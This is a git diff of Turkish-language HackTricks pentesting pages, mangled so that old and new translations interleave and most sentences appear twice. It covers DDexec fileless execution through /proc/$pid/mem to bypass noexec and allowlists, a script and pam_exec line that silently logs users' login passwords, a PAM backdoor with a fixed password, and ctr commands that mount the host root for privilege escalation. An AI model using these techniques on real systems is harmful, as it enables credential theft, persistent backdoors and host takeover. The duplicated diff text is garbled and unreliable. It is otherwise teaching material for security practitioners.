Linux'ta bir programı çalıştırmak için bir dosya olarak var olmalı, dosya sistemi hiyerarşisi üzerinden bir şekilde erişilebilir olmalıdır (bu sadece `execve()`'nin nasıl çalıştığını gösterir). Bu dosya diskte veya bellekte (tmpfs, memfd) bulunabilir ancak bir dosya yolu gereklidir. Bu, Linux sistemlerinde çalıştırılan şeyi kontrol etmeyi çok kolay hale getirmiştir, tehditleri ve saldırganın araçlarını tespit etmeyi veya onların hiçbir şeyini çalıştırmalarını engellemeyi kolaylaştırır (_ör._ ayrıcalıklı olmayan kullanıcıların herhangi bir yürütülebilir dosyayı herhangi bir yere yerleştirmelerine izin vermemek).
Ancak bu teknik, tüm bunları değiştirmek için burada. İstediğiniz süreci başlatamazsanız... **zaten var olan bir süreci ele geçirirsiniz**.
Ancak bu teknik, tüm bunları değiştirmek için burada. Eğer istediğiniz işlemi başlatamıyorsanız... **o zaman zaten var olan bir işlemi ele geçirin**.
Bu teknik, **salt okunur, noexec, dosya adı beyaz listeleme, hash beyaz listeleme gibi yaygın koruma tekniklerini atlamak** için kullanılabilir.
Bu teknik, **salt okunur, noexec, dosya adı beyaz listeleme, hash beyaz listeleme gibi yaygın koruma tekniklerini atlamayı** sağlar.
## Bağımlılıklar
Son komut dosyasının çalışması için aşağıdaki araçlara bağımlılığı vardır, saldırdığınız sistemde erişilebilir olmaları gerekmektedir (varsayılan olarak hepsini her yerde bulabilirsiniz):
Son betik, çalışması için aşağıdaki araçlara bağlıdır, saldırdığınız sistemde erişilebilir olmaları gerekir (varsayılan olarak hepsini her yerde bulabilirsiniz):
```
dd
bash | zsh | ash (busybox)
@ -40,9 +41,9 @@ base64
```
## Teknik
Bir sürecin belleğini keyfi olarak değiştirebiliyorsanız, onu ele geçirebilirsiniz. Bu, zaten var olan bir süreci ele geçirmek ve başka bir programla değiştirmek için kullanılabilir. Bunun için ya `ptrace()` sistem çağrısını kullanarak (sistemde syscalls çalıştırma yeteneğine veya gdb'nin sistemde bulunmasına ihtiyaç duyar) veya daha ilginç olanı, `/proc/$pid/mem` dosyasına yazarak başarabiliriz.
Eğer bir işlemin belleğini keyfi olarak değiştirebiliyorsanız, onu ele geçirebilirsiniz. Bu, zaten var olan bir işlemi ele geçirip başka bir programla değiştirmek için kullanılabilir. Bunu ya `ptrace()` sistem çağrısını kullanarak (ki bunun için sistem çağrılarını yürütme yeteneğine veya sistemde gdb'nin bulunmasına ihtiyacınız vardır) ya da daha ilginç bir şekilde `/proc/$pid/mem` dosyasına yazarak başarabiliriz.
`/proc/$pid/mem` dosyası, bir sürecin tüm adres alanının (_örn. x86-64'te `0x0000000000000000` ile `0x7ffffffffffff000` arasında_) birbirine eşleştirilmesidir. Bu, bir ofset `x` ile bu dosyadan okuma veya yazma, sanal adres `x`'teki içeriği okuma veya değiştirmeyle aynıdır.
`/proc/$pid/mem` dosyası, bir işlemin tüm adres alanının (_ör._ x86-64'te `0x0000000000000000` ile `0x7ffffffffffff000` arasından) birbirine eşlenmiş bir görüntüsüdür. Bu, bu dosyadan bir ofset `x`'ten okuma veya yazma işlemi yapmanın, sanal adres `x`'teki içeriği okuma veya değiştirme işlemi yapmakla aynı olduğu anlamına gelir.
Şimdi, üstesinden gelmemiz gereken dört temel sorunumuz var:
@ -50,61 +51,60 @@ Bir sürecin belleğini keyfi olarak değiştirebiliyorsanız, onu ele geçirebi
* ASLR.
* Programın adres alanında eşlenmemiş bir adrese okuma veya yazma denememiz durumunda bir G/Ç hatası alırız.
Bu sorunların, mükemmel olmasa da iyi çözümleri vardır:
Bu sorunların, mükemmel olmasa da iyi olan çözümleri vardır:
* Çoğu kabuk yorumlayıcısı, ardından çocuk süreçler tarafından devralınacak dosya tanımlayıcılarının oluşturulmasına izin verir. Yazma izinleriyle kabuğun `mem` dosyasına işaret eden bir fd oluşturabiliriz... böylece bu fd'yi kullanan çocuk süreçler, kabuğun belleğini değiştirebilecektir.
* ASLR bile bir sorun değil, programın adres alanı hakkında bilgi edinmek için kabuğun `maps` dosyasını veya procfs'ten başka bir dosyayı kontrol edebiliriz.
* Bu yüzden dosya üzerinde `lseek()` yapmamız gerekiyor. Kabuktan bu yapılamaz, ancak kötü şöhretli `dd` kullanılarak yapılabilir.
* Çoğu kabuk yorumlayıcısı, çocuk işlemler tarafından devralınacak dosya tanımlayıcılarının oluşturulmasına izin verir. Yazma izinlerine sahip olan kabuk dosyasına işaret eden bir fd oluşturabiliriz... böylece bu fd'yi kullanan çocuk işlemleri kabuğun belleğini değiştirebilecektir.
* ASLR bile bir sorun değil, programın adres alanı hakkında bilgi edinmek için kabuğun `maps` dosyasını veya procfs'ten başka herhangi bir dosyayı kontrol edebiliriz.
* Bu nedenle dosya üzerinde `lseek()` yapmamız gerekiyor. Kabuktan bu yapılamaz, ancak ünlü `dd` kullanılarak yapılabilir.
### Daha detaylı olarak
### Daha Detaylı
Adımlar oldukça kolaydır ve bunları anlamak için herhangi bir uzmanlık gerektirmez:
Adımlar oldukça kolaydır ve bunları anlamak için herhangi bir uzmanlık türüne ihtiyaç duymazlar:
* Çalıştırmak istediğimiz ikili ve yükleyiciyi analiz edin ve hangi eşlemelere ihtiyaç duyduklarını bulun. Ardından, her bir `execve()` çağrısında çekirdeğin yaptığı adımların genel olarak aynısını gerçekleştirecek bir "shell" kodu oluşturun:
* Çalıştırmak istediğimiz ikili dosyayı ve yükleyiciyi ayrıştırarak ihtiyaç duydukları eşlemeleri bulun. Daha sonra, her `execve()` çağrısında çekirdeğin yaptığı genel olarak aynı adımları gerçekleştirecek bir "kabuk" kodu oluşturun:
* Söz konusu eşlemeleri oluşturun.
* İkili dosyaları bunlara okuyun.
* İkili dosyaları içlerine okuyun.
* İzinleri ayarlayın.
* Son olarak, programın argümanları için yığını başlatın ve yükleyici tarafından gereken yardımcı vektörü yerleştirin.
* Son olarak, program için argümanlarla yığını başlatın ve yükleyici tarafından gereken yardımcı vektörü yerleştirin.
* Yükleyiciye atlayın ve gerisini ona bırakın (program tarafından gereken kütüphaneleri yükleyin).
* İşlem tarafından gerçekleştirilen sistem çağrısından sonra döneceği adresi `syscall` dosyasından alın.
* Bu, yazılabilir olmayan sayfaları `mem` aracılığıyla değiştirebileceğimiz bir yer olan, yürütülebilir olan yere kendi shell kodumuzu üzerine yazın.
* Çalıştırmak istediğimiz programı sürecin stdin'ine geçirin (söz konusu "shell" kodu tarafından `read()` edilecektir).
* Bu noktada, programımız için gerekli kütüphaneleri yüklemek ve ona atlamak yükleyiciye bağlıdır.
* İşlemi yürüten sistem çağrısı dosyasından, işlemi yürüttükten sonra geri döneceği adresi alın.
* Bu yere, yürütülebilir olacak şekilde, kendi kabuk kodumuzu (`mem` aracılığıyla yazılamayan sayfaları değiştirebiliriz) üzerine yazın.
* Çalıştırmak istediğimiz programı işlemin stdin'ine geçirin (bu, söz konusu "kabuk" kodu tarafından `read()` edilecektir).
* Bu noktada, programımız için gerekli kütüphaneleri yüklemek ve ona atlamak yükleyiciye kalmıştır.
**Araç için** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec) **adresine bakın**
**Araç için** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)
## EverythingExec
`dd`'ye alternatif olarak birkaç seçenek vardır, bunlardan biri olan `tail`, `mem` dosyası üzerinde `lseek()` yapmak için şu anda varsayılan olarak kullanılan programdır (`dd` kullanmanın tek amacı buydu). Söz konusu alternatifler şunlardır:
`dd`'ye alternatif olarak birkaç seçenek bulunmaktadır, bunlardan biri olan `tail`, şu anda `mem` dosyası üzerinde `lseek()` yapmak için varsayılan olarak kullanılan programdır (`dd` kullanmanın tek amacı buydu). Söz konusu alternatifler şunlardır:
```bash
tail
hexdump
cmp
xxd
```
Değişken `SEEKER`'ı ayarlayarak kullanılan arayıcıyı değiştirebilirsiniz, örneğin:
Değişken `SEEKER` ayarlanarak kullanılan seeker değiştirilebilir, _ör._:
```bash
SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
```
Eğer betikte uygulanmamış başka geçerli bir arayıcı bulursanız, `SEEKER_ARGS` değişkenini ayarlayarak hala kullanabilirsiniz:
Eğer betikte uygulanmamış başka geçerli bir arayıcı bulursanız, yine de `SEEKER_ARGS` değişkenini ayarlayarak kullanabilirsiniz:
```bash
SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
```
Engelleyin bunu, EDR'lar.
## Referanslar
* [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec)
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,36 +1,37 @@
# Linux Sonrası Sızma
# Linux Saldırı Sonrası İşlemler
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}
## PAM ile Oturum Açma Parolalarını Yakalamak
## PAM ile Oturum Açma Şifrelerini Yakalama
Her kullanıcının giriş yaparken kullandığı her parolayı kaydetmek için bir PAM modülü yapılandıralım. PAM nedir bilmiyorsanız:
Her kullanıcının giriş yaparken kullandığı her şifreyi kaydetmek için bir PAM modülü yapılandıralım. PAM nedir bilmiyorsanız şuraya bakın:
{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}
**Daha fazla ayrıntı için [orijinal yayına](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/) bakın**. İşte sadece bir özet:
**Daha fazla ayrıntı için [orijinal yazıya](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/) bakın**. Bu sadece bir özet:
**Teknik Genel Bakış:**
Pluggable Authentication Modules (PAM), Unix tabanlı sistemlerde kimlik doğrulama yönetiminde esneklik sunar. Giriş süreçlerini özelleştirerek güvenliği artırabilirler, ancak yanlış kullanılırsa risk oluşturabilirler. Bu özet, PAM kullanarak giriş kimlik bilgilerini yakalamak için bir teknik ve azaltma stratejilerini açıklar.
Pluggable Authentication Modules (PAM), Unix tabanlı sistemlerde kimlik doğrulamayı yönetmede esneklik sunar. Giriş süreçlerini özelleştirerek güvenliği artırabilirler ancak yanlış kullanıldığında risk oluşturabilirler. Bu özet, PAM kullanarak giriş kimlik bilgilerini yakalamak için bir teknik ve azaltma stratejilerini açıklar.
**Kimlik Bilgilerini Yakalama:**
- `toomanysecrets.sh` adında bir bash betiği, giriş denemelerini kaydetmek için oluşturulur ve tarih, kullanıcı adı (`$PAM_USER`), parola (stdin aracılığıyla) ve uzak ana bilgisayar IP'si (`$PAM_RHOST`) bilgilerini `/var/log/toomanysecrets.log` dosyasına kaydeder.
- Betik çalıştırılabilir hale getirilir ve `pam_exec.so` modülü kullanılarak PAM yapılandırmasına (`common-auth`) entegre edilir. Betiğe sessizce çalıştırma ve kimlik doğrulama belirtecinin betiğe açık olmasını sağlayan seçenekler eklenir.
- Bu yaklaşım, bir Linux ana bilgisayarın nasıl istismar edilerek kimlik bilgilerinin gizlice kaydedilebileceğini gösterir.
- `toomanysecrets.sh` adında bir bash betiği oluşturulur ve giriş denemelerini kaydetmek için yapılandırılır; tarih, kullanıcı adı (`$PAM_USER`), şifre (stdin aracılığıyla) ve uzak ana bilgisayar IP'si (`$PAM_RHOST`) `/var/log/toomanysecrets.log` dosyasına kaydedilir.
- Betik yürütülebilir hale getirilir ve `pam_exec.so` modülü kullanılarak sessizce çalıştırılması ve kimlik doğrulama belirtecinin betiğe açık hale getirilmesi seçenekleriyle PAM yapılandırmasına (`common-auth`) entegre edilir.
- Bu yaklaşım, bir Linux ana bilgisayarının nasıl istismar edilerek kimlik bilgilerinin gizlice kaydedilebileceğini göstermektedir.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
@ -40,38 +41,24 @@ sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
### PAM'e Arka Kapı Ekleme
### PAM Arka Kapı Ekleme
**Daha fazla ayrıntı için [orijinal yazıya](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9) bakın**. İşte sadece bir özet:
**Daha fazla ayrıntı için [orijinal yazıya](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9) bakın**. Bu sadece bir özet:
Pluggable Authentication Module (PAM), Linux altında kullanıcı kimlik doğrulaması için kullanılan bir sistemdir. Üç temel kavram üzerinde çalışır: **kullanıcı adı**, **parola** ve **hizmet**. Her hizmet için yapılandırma dosyaları `/etc/pam.d/` dizininde bulunur ve kimlik doğrulamasını paylaşılan kütüphaneler yönetir.
Pluggable Authentication Module (PAM), Linux altında kullanılan bir sistemdir ve kullanıcı kimlik doğrulaması için kullanılır. Üç ana kavram üzerinde çalışır: **kullanıcı adı**, **şifre** ve **hizmet**. Her hizmet için yapılandırma dosyaları, kimlik doğrulamasını ele alan paylaşılan kütüphanelerin bulunduğu `/etc/pam.d/` dizininde bulunur.
**Amaç**: PAM'ı değiştirerek, gerçek kullanıcı parolasını atlayarak belirli bir parola ile kimlik doğrulamasına izin vermek. Bu özellikle, neredeyse tüm hizmetler için parola doğrulaması için kullanılan `common-auth` dosyası tarafından dahil edilen `pam_unix.so` paylaşılan kütüphanesine odaklanır.
**Amaç**: PAM'ı değiştirerek belirli bir şifre ile kimlik doğrulamasına izin vermek ve gerçek kullanıcı şifresini atlamak. Bu özellikle, neredeyse tüm hizmetler tarafından şifre doğrulaması için kullanılan `common-auth` dosyasında bulunan `pam_unix.so` paylaşılan kütüphaneye odaklanmaktadır.
### `pam_unix.so`'yu Değiştirme Adımları:
### `pam_unix.so`'yi Değiştirme Adımları:
1. `common-auth` dosyasında **Kimlik Doğrulama Yönergesini** bulun:
- Kullanıcının parolasını kontrol eden satır `pam_unix.so`'yu çağırır.
1. **Kimlik Doğrulama Yönergesini Bulun** `common-auth` dosyasında:
- Kullanıcının şifresini kontrol etmekten sorumlu olan satır `pam_unix.so`'yu çağırır.
2. **Kaynak Kodunu Değiştirin**:
- `pam_unix_auth.c` kaynak dosyasına, önceden tanımlanmış bir parola kullanılıyorsa erişimi sağlayan bir koşullu ifade ekleyin, aksi takdirde normal kimlik doğrulama sürecine devam eder.
3. Değiştirilmiş `pam_unix.so` kütüphanesini uygun dizine **yeniden derleyin ve değiştirin**.
- `pam_unix_auth.c` kaynak dosyasına, önceden belirlenmiş bir şifre kullanıldığında erişimi sağlayan bir koşullu ifade ekleyin, aksi takdirde normal kimlik doğrulama sürecine devam eder.
3. **Değiştirilmiş `pam_unix.so` kütüphanesini Yeniden Derleyin ve Değiştirin** uygun dizine.
4. **Test Etme**:
- Önceden tanımlanmış parola ile çeşitli hizmetlere (giriş, ssh, sudo, su, ekran koruyucu) erişim sağlanırken, normal kimlik doğrulama süreçleri etkilenmez.
- Önceden belirlenmiş şifre ile çeşitli hizmetlere (giriş, ssh, sudo, su, ekran koruyucu) erişim sağlanırken normal kimlik doğrulama süreçleri etkilenmez.
{% hint style="info" %}
Bu süreci [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) ile otomatikleştirebilirsiniz.
{% endhint %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -1,22 +1,23 @@
# Containerd (ctr) Yetki Yükseltme
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Temel bilgiler
**Containerd** ve `ctr`'yi öğrenmek için aşağıdaki bağlantıya gidin:
**Containerd** ve `ctr`'nin ne olduğunu öğrenmek için aşağıdaki bağlantıya gidin:
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
@ -24,12 +25,12 @@ HackTricks'i desteklemenin diğer yolları:
## PE 1
Eğer bir ana bilgisayarda `ctr` komutunu bulursanız:
Bir ana bilgisayarda `ctr` komutunu içerdiğini bulursanız:
```bash
which ctr
/usr/bin/ctr
```
Aşağıdaki komutla görüntüleri listeleyebilirsiniz:
Resimleri listeleyebilirsiniz:
```bash
ctr images ls
@ -40,7 +41,7 @@ REF TYPE
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
```
Ve sonra **ana bilgisayarın kök klasörünü bağlayarak bu görüntülerden birini çalıştırın**:
Ve sonra **bu görüntülerden birini çalıştırarak ana makine kök klasörünü bağla**:
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
@ -51,22 +52,23 @@ Ayrıcalıklı bir konteyneri şu şekilde çalıştırabilirsiniz:
```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
Aşağıdaki sayfada belirtilen tekniklerden bazılarını kullanarak, **ayrıcalıklı yetenekleri kötüye kullanarak ondan kaçabilirsiniz**:
Sonra, ayrıcalıklı yetenekleri kötüye kullanarak ondan kaçmak için aşağıdaki sayfada belirtilen tekniklerden bazılarını kullanabilirsiniz:
{% content-ref url="docker-security/" %}
[docker-security](docker-security/)
{% endcontent-ref %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# D-Bus Numaralandırma ve Komut Enjeksiyonu Yetki Yükseltme
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## **GUI numaralandırma**
